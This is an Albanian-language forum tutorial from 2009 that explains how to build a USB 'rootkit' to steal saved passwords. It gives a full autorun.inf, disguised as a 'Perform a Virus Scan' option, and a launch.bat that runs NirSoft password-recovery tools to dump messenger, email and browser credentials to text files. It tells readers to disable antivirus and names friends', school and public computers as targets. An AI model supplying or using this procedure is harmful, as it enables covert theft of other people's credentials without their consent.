MC RzA

Welcome/Mir Se Vini !
 
HomeCalendarFAQSearchMemberlistUsergroupsRegisterLog in

Share | 
 

 Si te krijojme nje USB rootkit qe vjedh te gjihte passat ne PC

Go down 
AuthorMessage
MC RzA
Admin


Posts : 181
Join date : 2009-10-27

PostSubject: Si te krijojme nje USB rootkit qe vjedh te gjihte passat ne PC   Tue Oct 27, 2009 10:53 am

Kodi:
------------------------------------------------------------------
------------------------------------------------------------------

Titulli : Si te krijojme nje USB rootkit qe vjedh te gjihte passat ne PC
Autori : CrackDB
Web : rrjeta.org

-----------------------------------------------------------------
----------------------------------------------------------------Sot do ju mesoj se si te hackojme passworda duke perdorur USB Pen Drive.
Siq e dijme Windwos i ruan zakonisht passwordat qe i perdorim shpesh ,duke perfshire Instant Messengers si
MSN , Yahoo,AOL windows Messenger etj .

Tjerash ktyre Windows ruan edhe passworda tjere sikur e Outlook Express psh ,SMPT,POP,FTp accounta dhe
passworda qe jepen automatikisht si ne IE dhe FireFox .Egzitojne shume mundesi qe ti marrim keto passworda nga
vendet e tyre .Duke perdorur keto menyra dhe nje USB ju mund te krijoni nje Rootkit per te hackuar passworda
nga nje PC i shokut tuaj apo nje kompjuter ne shkolle psh LOL

Neve na nevoiten keto vegla per te krijuar nje Rootkit .

1)MessenPass: I merr passwordat per shume Instant messengers si MSN Messenger, Windows Messenger ,Yahooo Messenger , IQL Lite 4.x/2003
,AOL Instant Messenger e cila perfshin edhe Netscape 7, Trillian ,Miranda , dhe GAiM.

2)Mail Passview: Ruan passwordat per keto aplikacione per menagjim te emmailave :Outlook Express,Microsoft Outlook 2000,(vetem POP3 dhe SMTP accounta)
,Microsoft Outlook 2002/2003(POP3 ,IMAP,HTTP dhe SMTP accounta),INcredimail, Eudora ,NerscapeMail,Mozilla Thunderbird,GroupMail free.
Mail Passview mund gjihtashtu te nxerr passwordat per accounta qe jane te bazuar ne web si : HOtmail,Yahoo!,Gmail, nese perdorni programet qe bashkepunojne me keto accounta.

3) IE Passview : Eshte nje vegel e vogel e cila nxerr te gjitha passwordat te cilat ruhen ne Internet Explorer .Sigurisht qe kompatibil me INternet Explorer 7.0 si dhe versionet me te vjetra te
IR si 6.0 dhe 4.0 etj .

4) Protected Storage Passview : Nxeerr te gjithe passwordat qe ruhen mbrenda hapesires se siguruar qe thuet ,duke perfshire Autocomplete passworda nga Internet Explorer ,passwordat e faqeve qe jane protected si
MSN explorer dhe me shume .

5)PAsswordFox :eshte nje vegel e vogel per te nxerr passwordat qe ruhen ne MOzilla FireFox duke perfshire edhe Username bashke me te .

----------------------------------------------------------------------

Ketu eshte nje hap pasi hapi tutorial si te krijojme nje Hacking Rookit .

Kujdes: Duhet ta deaktivizoni antivirusin perkohesisht per te ndjekur hapa ne vazhdim.

1.Shkarkoni te 5 veglat qe i permenda me larte dhe kopjoni vetem File-at (.exe) qe jane ne USB tuajen .

psh : Kopjoni file-at -mspass.exe , mailpv.exe , iepv.exe dhe passwordfox.exe ne USB tuajen.

2.Hapeni NotePad dhe shkruani kete kode ne vazhdim:

Kodi:
[autorun]
open=launch.bat
ACTION= Perform a Virus ScanRuajeni kete Notepad dokument dhe emrone nga New Text Document ne autorun.inf
Tashti kopjone kete autorun.inf file ne USB tuajen.

3.Tash serish krijo nje Notepad dokument te ri dhe shkruani kete kode:

Kodi:
start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txtdhe kete e emroni nga New Text Document ne launch.bat

Edhe kete gjihtashtu duhet ta kopjoni ne USB tuajen.

Tashti Rootkit i juaj eshte gati dhe tash eshte ready per te hacku passat ne kompjutera te ndryshem si i shokut tuaj
i shkolles apo diku ne vende pubilike qe mund te qaseni ne te .

Tash dot ju tregoj si te veprojme me kete USB Rootkit:

1.Futeni USB ne kompjuter dhe dritarja e Atuorun do te hapet .(kjo eshte sepse kemi krijuar me heret nje autorun )

2.Ne Pop-up dritaren selektone opcionin e pare (perform a Virus Scan)

3.Tash te gjihte veglat qe i kemi fut ne USB per te marr passat ne PC e kryjne pune e tyre kadal dale ,ky proces mund te zgjas disa sekonda , passwordat do te ruehn ne .TXT filen.

4.Largoejni USB-n nga PC , dhe do te shihni passat ne .TXT filen e regjistruar ne USBKy trik funksionon ne Windows 2000 ,Xp,Vista, dhe 7

Mbani ne mend: Kjo procedure mund te merr passat vetem ne kompjuter ,nese ka !

Falemnderit per lexim ,Me respekt Dardan Beqaj .


Ky tutorial eshte origjinal i shkruaj nga une , dhe nese e kopjoni ju kisha lut me qit autorin ne kete rast jam une .NEse kenimirekuptim atehere veproni siq thaashe .
Back to top Go down
View user profile http://mc-rza.forumotion.com
 
Si te krijojme nje USB rootkit qe vjedh te gjihte passat ne PC
Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
MC RzA :: Mësime/Tutorials-
Jump to: